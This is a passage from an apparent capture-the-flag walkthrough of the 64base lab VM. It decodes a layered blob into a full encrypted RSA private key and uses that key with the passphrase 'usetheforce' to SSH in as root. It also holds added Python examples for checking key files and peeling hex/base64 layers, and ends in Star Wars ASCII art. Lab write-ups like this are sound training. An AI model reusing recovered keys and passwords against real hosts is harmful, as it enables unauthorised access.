3533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a475348453
4646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----
eric@geoda:/tmp$ 

Nice! As expected, this was in fact an RSA Private Key!!

I echo this into my authorized_keys file and take away all permissions except for my current user:


eric@geoda:/tmp$ echo "-----BEGIN RSA PRIVATE KEY-----
> Proc-Type: 4,ENCRYPTED
> DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
> 
> mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
> YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
> 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
> kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
> MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
> k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
> wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
> guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
> TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
> 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
> AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
> 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
> +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
> fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
> +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
> 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
> rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
> Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
> Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
> Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
> Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
> qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
> 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
> fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
> /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
> -----END RSA PRIVATE KEY-----
> " > ~/.ssh/authorized_keys
eric@geoda:/tmp$ chmod 0400 ~/.ssh/authorized_keys

With my file set up, I try to log in as root:


eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys 
Enter passphrase for key '/home/eric/.ssh/authorized_keys': 
root@192.168.56.103's password: 
Permission denied, please try again.
root@192.168.56.103's password: 
Permission denied, please try again.
root@192.168.56.103's password: 
Permission denied (publickey,password).
eric@geoda:/tmp$

So close! Looks like it still requires a password. But what's my password? I realized that the file that I copied down was a JPEG and I never actually viewed it.


It's a picture with the words "Use the Force". I bet this is the password! I tried many variations and "usetheforce" was the correct one!


eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys 
Enter passphrase for key '/home/eric/.ssh/authorized_keys': 

Last login: Tue Apr 25 18:38:02 2017 from 192.168.56.1

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
root@64base:~# 

Success! And there's flag6!


flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
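The `Proc-Type` and `DEK-Info` lines in the decoded key are what made ssh ask for a passphrase before anything else. As an added example (not from the original walkthrough), this checker reads those headers and reports key-file hygiene problems; `inspect_private_key` and both sample keys are constructed for illustration, with filler in place of key material.

```python
import base64
import os
import re
import stat
import tempfile

PEM_BEGIN = re.compile(r"^-----BEGIN ([A-Z0-9 ]+)-----$")


def inspect_private_key(path):
    """Describe a PEM private key file: label, encryption, hygiene findings."""
    report = {"label": None, "encrypted": None, "cipher": None,
              "iv_hex": None, "findings": []}
    with open(path, "r", encoding="ascii", errors="replace") as fh:
        lines = [ln.rstrip("\r\n") for ln in fh]

    # RFC 1421 style headers sit between the BEGIN line and the first blank line.
    headers, in_block = {}, False
    for line in lines:
        begin = PEM_BEGIN.match(line)
        if begin and not in_block:
            report["label"], in_block = begin.group(1), True
        elif in_block:
            if ":" not in line:  # blank line or base64 body: headers are over
                break
            name, _, value = line.partition(":")
            headers[name.strip()] = value.strip()

    label = report["label"]
    if label is None or not label.endswith("PRIVATE KEY"):
        report["findings"].append("no PEM private key found")
        return report

    if headers.get("Proc-Type") == "4,ENCRYPTED":
        # Traditional OpenSSL format, the one shown in the walkthrough.
        cipher, _, iv = headers.get("DEK-Info", "").partition(",")
        report.update(encrypted=True, cipher=cipher or None, iv_hex=iv or None)
        report["findings"].append(
            "legacy PEM encryption: key derived from the passphrase with MD5, "
            "so a guessable passphrase gives little protection")
    elif label == "ENCRYPTED PRIVATE KEY":
        report["encrypted"] = True  # PKCS#8: parameters live inside the body
    elif label == "OPENSSH PRIVATE KEY":
        report["findings"].append(
            "OpenSSH container: cipher is inside the body, not checked here")
    else:
        report["encrypted"] = False
        report["findings"].append("private key is stored without a passphrase")

    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        report["findings"].append(
            "permissions %04o allow group/other access" % mode)
    if os.path.basename(path) == "authorized_keys":
        report["findings"].append(
            "private key saved as authorized_keys, the file sshd reads as the "
            "list of public keys allowed to log in to this account")
    return report


# Constructed samples: header layout as on the page, IV and body are filler.
_BODY = base64.b64encode(b"constructed filler, not key material").decode()
SAMPLE_ENCRYPTED_KEY = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n" + _BODY + "\n"
    "-----END RSA PRIVATE KEY-----\n")
SAMPLE_UNENCRYPTED_KEY = (
    "-----BEGIN RSA PRIVATE KEY-----\n" + _BODY + "\n"
    "-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "authorized_keys")
        with open(path, "w") as fh:
            fh.write(SAMPLE_ENCRYPTED_KEY)
        os.chmod(path, 0o400)
        for key, value in inspect_private_key(path).items():
            print(key, "=", value)
```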


The Finale


I try to decode the flag but realize there are many layers alternating between hex and base64. I run xxd and base64 -d multiple times until I get the original message:



root@64base:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
root@64base:~# 
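The hex and base64 layers peeled by hand here, and earlier for the JPEG Comment field, can be removed by one loop that detects each layer. This is an added example, not part of the original walkthrough; `peel`, `wrap` and the sample blobs are constructed for illustration, and the stop rule (a decoded layer must be printable text) is an assumption that fits this VM's text payloads.

```python
import base64
import binascii
import re
import string

HEX_RE = re.compile(rb"^[0-9a-fA-F]+$")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = frozenset(string.printable.encode())


def is_text(data: bytes) -> bool:
    """True when every byte is printable ASCII (the stop heuristic)."""
    return bool(data) and all(b in PRINTABLE for b in data)


def try_hex(data: bytes):
    """Decode an `xxd -p` style dump, or return None if it is not one."""
    if len(data) % 2 or not HEX_RE.match(data):
        return None
    return binascii.unhexlify(data)


def try_base64(data: bytes):
    """Decode standard base64, or return None if it is not valid."""
    if len(data) % 4 or not B64_RE.match(data):
        return None
    try:
        return base64.b64decode(data, validate=True)
    except binascii.Error:
        return None


# Hex is tried first: a hex dump also fits the base64 alphabet, so the
# reverse order would misread it.
DECODERS = (("hex", try_hex), ("base64", try_base64))


def peel(blob, max_layers=16):
    """Strip nested hex/base64 layers.

    Returns (payload_bytes, layers); layers lists the encodings in the
    order they were removed, outermost first.
    """
    data = blob.encode() if isinstance(blob, str) else bytes(blob)
    layers = []
    for _ in range(max_layers):
        # xxd and base64 wrap their output; drop line breaks only, so a
        # payload containing spaces is never mistaken for an encoding.
        compact = data.translate(None, b"\r\n")
        for name, decoder in DECODERS:
            decoded = decoder(compact)
            if decoded is not None and is_text(decoded):
                layers.append(name)
                data = decoded
                break
        else:
            break  # neither encoding applies: data is the payload
    return data, layers


def wrap(payload: bytes, order):
    """Build a constructed test blob; each layer ends in a newline, as
    `echo ... | xxd -p` and `base64` output does."""
    data = payload
    for name in order:
        data = binascii.hexlify(data) if name == "hex" else base64.b64encode(data)
        data += b"\n"
    return data


# Constructed samples, not data from the VM.
FLAG_STYLE = wrap(b"constructed payload: cat /tmp/example\n",
                  ["base64", "hex", "base64", "hex", "base64"])
COMMENT_STYLE = wrap(b"-----BEGIN CONSTRUCTED SAMPLE-----\nnot a key\n"
                     b"-----END CONSTRUCTED SAMPLE-----\n", ["base64", "hex"])

if __name__ == "__main__":
    for sample in (FLAG_STYLE, COMMENT_STYLE):
        payload, layers = peel(sample)
        print(" -> ".join(layers), "=>", payload.decode().strip())
```

Short strings are ambiguous (a four-character base64 value can also be valid hex), so treat the reported layer list as a hint and check the payload by eye.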


It says "base64 -d /var/local/.luke|less.real". I of course do as it says and I'm presented with the finale!



        \ \        / / | | | |  __ \                     
          \ \  /\  / /__| | | | |  | | ___  _ __   ___    
           \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \   
            \  /\  /  __/ | | | |__| | (_) | | | |  __/   
         __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ 
         \ \   / /          |  __ \(_)   | | |_   _| | | |
          \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
           \   / _ \| | | | | |  | | |/ _` |   | | | __| |
            | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
            |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
    
_____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
%=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
LS
                 .-. .-.
               .=========.         E x t e r i o r ,   A e r i a l   V i e w
               ||.-.7.-.||         -----------------------------------------
               ||`-' `-'||
               `========='
                `-'| |`-'8               1 .............. Sensor Suite Tower
          ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
         /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
        /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
       /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
       \____\\`==========='//____/       6 .................... Guard towers
       /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
    __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
   /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
  /  \ \  //`-._//|   |\\_.2'\\  / /  \
 /  _.-==='_____//.-=-.\\_____`===-._  \
 \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
  \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
   \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
      \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
       \_____\=============/_____/       tresses have  walls up to 10 meters
       /____///    ___    \\\____\       thick  to  guard   against   ground
       \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
        \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
         \_____|  | 5 | 6|_____/         space attacks.
               `--'   `--'
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                           U           E x t e r i o r ,   S i d e   V i e w
                          /_\          -------------------------------------
                       1 [___]
                         :`:':           1 .............. Sensor Suite Tower
                         `:::'           2 ... Heavy Twin Turbolaser Turrets
                  _       :_:       _    3 ............. Heavy Laser Turrets
                =[ ]2     [%]      [ ]=  4 ....... Tie Fighter Launch Chutes
                 :=:      :=:      :=:   5 ............... Heavy Blast Doors
                _|_|_   __| |__   _|_|_  6 .................... Guard Towers
               / /XX|\ /__|_|__\ /|XX\ \
         3    /4/XXX| | _/___\_ | |XXX\ \             7 ....... AT-AT Walker
    --===____/--===X|_|/_______\|_|X===--\____===--   8 ........ AT-ST Scout
     /__| |     /l_\\             //_|\     |_|__\
    /~~.' |    /:'  \\   _____   //  `:\    | `.  \
   /   | .'   / |    \\==|||||==//    | \   `. |   \   7    8
  /   .' |   / .'     |  ||5|| 6|     `. \   | `.   \  xx=   _
 /____|__|__/__|______l__|||||__l______|__\__|__|____\ ll   <~

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                                 O u t e r   D e f e n s e s
            |                      |             ---------------------------
         ^_[]_^                 ^_[]_^
         |----|               5 |----|        1 ... High Voltage Death Fence
 ________`-..-'________4________`-..-'______  2 ....... Perimeter Gate House
 ===========================================  3 ........ Powered Force Field
          `||'                   `||'         4 .......... Fortified Catwalk
           ||     ^==^   ^==^     ||          5 ......... Observattion tower
 ___.____._ll_._1_|--|   |--|___._ll_.____.____
 XXX|XXXX|XIIX|XXX|--| 3 |--|XXX|XIIX|XXXX|XXXX
 XXX|XXXX|XIIX|XXX| 2|   |  |XXX|XIIX|XXXX|XXXX

 The outer perimeter is  marked  by a  high-voltage  "death fence."  Powered
 Force fields  placed at regular intervals along the fence may be turned off
 to permit entry and exit.  Observation towers,  connected by fortified cat-
 walks,  are set back from the fence and constantly manned by stormtroopers.
 Other outer  defenses  include energy mine fields,  modified patrol Droids,
 and AT-ST Scout Walkers.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             _
            /|                               L a n d i n g   P l a t f o r m
          -==+                               -------------------------------
            :
         [__________]               Up to two Lambda-class shuttles and four
         `' ||  ||`-'               AT-AT  Walkers can dock at the platform.
           ========  =xx            A loading  ramp  leads directly from the
            ||  ||    ll            platform into the garrison complex.
     ~~~~~~~~~~~~~~~~~~~~~~
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                     I n t e r i o r ,   L e v e l s   1 - 5
                                     ---------------------------------------

          ______         ______      The first 5 levels of the garrison com-
         / ____ \_______/ ____ \     plex are of identical layout, construc-
        / /    \_________/    \ \    ted  around  a  level-spanning  surface
       / /      |   3   |  5   \ \   vehicle bay.  Refer to the key below to
       \ \       \_____/_______/ /   determine what each level contains.
       / /    o   |o o|   o    \ \
    __/ /  2    .' o4o `.    6  \ \__    1 ... Storage Gallery (levels 1-2),
   / __/      .' ._o_o_. `.      \__ \         Armory (levels 3-4), Training
  / /  `-.  .' .'  10   `. `.  .-'  \ \        Facilities   and   Recreation
 / /      ~' .'`-._____.-'`. `~      \ \       Rooms (level 5)
 \ \     o  <  C  | | |  D  >  o  7  / / 2 ... Stormtrooper Barracks (levels
  \ \__      \    ' ' '    /      __/ /        1-3),    Security    Barracks
   \__ \  1  |----  9  ----|~-._ / __/         (levels 4-5)
      \ \    |====    B====|    Y /      3 ...... Base Security (levels 1-5)
       \ \   |----     ----|   / /       4 ......... Turbolifts (levels 1-6)
       / /   |__A_     _ __| 8 \ \       5 .... Detention Block (levels 1-5)
       \ \      | |   | |      / /       6 ... Technical and Service Person-
        \ \_____| |   | |_____/ /              nel Barracks (levels 1-5)
         \_____ `o|   |o' _____/         7 ... Technical Shops (levels 1-2),
               `--'   `--'                     Medical   Bay    (level   3),
                                               Science Labs (levels 4-5)
                8 ... Storage Gallery (levels 1-2), Droid Shops (levels 3-5)
                9 ...................... Surface Vehicle  Bay  (levels 1-5):
                A .................................. AT-ST Scout Walker Bays
                B ........................................ AT-AT Walker Bays
                C ...................... Vehicle Maintenance and Repair Deck
                D ........................................ Speeder Bike Deck
                10 ........................... Miscellaneous Vehicle Parking

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   6
                                           ---------------------------------
         ____           ____
        / __ \_________/ __ \        Base command personnel,  control rooms,
       / /  \___________/  \ \       rooms,  trade  mission,  and diplomatic
       \ \ o     oo      o / /       offices are located on this level.
       / /       oo----.   \ \
      / /   8  __oo     `.1 \ \      1 ....... Sensor Monitors, Tractor Beam
   __/ /\    .~  ||   2   \  \ \__                       and Shield Controls
  / __/  \ .' 9.-'`-.      | /\__ \  2 ....................... Computer Room
 / /   o  \|__:   o  :_____|/ o  \ \ 3 ....................... Meeting Rooms
 \ \__  7 .---: 10   :------.3 __/ / 4 ...... Officers' and Pilots' Quarters
  \__ \  /     `-..-'        \/ __/  5 ... Trade Mission, Diplomatic Offices
     \ \/\   5   ||          / /     6 ........... Base Commander's Quarters
      \ \ `.     ||    4    / /                                  and offices
       \ \ o~`---||      o / /       7 ............ Officer Recreation Rooms
       / /6  ____||_____   \ \       8 ............................. Offices
       \ \__/ _________ \__/ /       9 ................... Base Control Room
        \____/         \____/        10 ..................... Reception Area


____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   7
                                           ---------------------------------
        __             __
       /_]\           /[_\        The TIE Fighter  Hanger  Deck  houses  the
       \ \,===========./ /        garrison's TIE fighters in standard-design
       //:o-----------o:\\        ceiling racks.  Bases are usually equipped
      /// X  X X X X  X \\\       with  30 TIE fighters and five TIE bombers
     /// X X  X_X_X  X X \\\      (a single  bomber  takes  up the same rack
  __/// X X   [___]   X X \\\__   space as two fighters).  Five  to 15 ships
 /\_/o X X  1 &/3\&    X X o\_/\  are on constant  patrol,  depending on the
 \]_\\ X X   <\\_//>       //_[/  base's readiness level.
    \\\ X X   \>&</2  X []///
     \\\ X X   []    X []///      1 .............. TIE Fighter Ceiling Racks
      \\\ X   [] []     ///                           (holds up to 40 craft)
       \\:o-----------o://        2 ............. Lift Platforms, to Level 8
       /_/`==========='\_\        3 .................. Flight Control Center
       \_]/           \[_/        X ............................ TIE Fighter
                                  [] ............................ TIE Bomber

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   8
                                           ---------------------------------
                                                      (not shown)

  The Flight Deck contains the  tractor beam  generators which catapult out-
  going craft into the open sky and reel in landing ships. Pilots relinquish
  control of  their ships during take off and landing because of the limited
  maneuvering area within the chutes.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                               S u b - L e v e l   I n s t a l l a t i o n s
                               ---------------------------------------------
                                                (not shown)

  A large underground section of the base  houses the main power and back-up
  generators, the tractor beam and deflector shield generators, the environ-
  ment  control  station,  and  the  waste  disposal and refuse units.  Some
  storage facilities are also located here.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Version 1.9 (released 941211).
 Pictures by Lennert Stock  (LS),  Rowan Crawford (-Row),  Ray Brunner,  Bob
 VanderClay and Joe Rumsey.  The pictures work best when shown on a white on
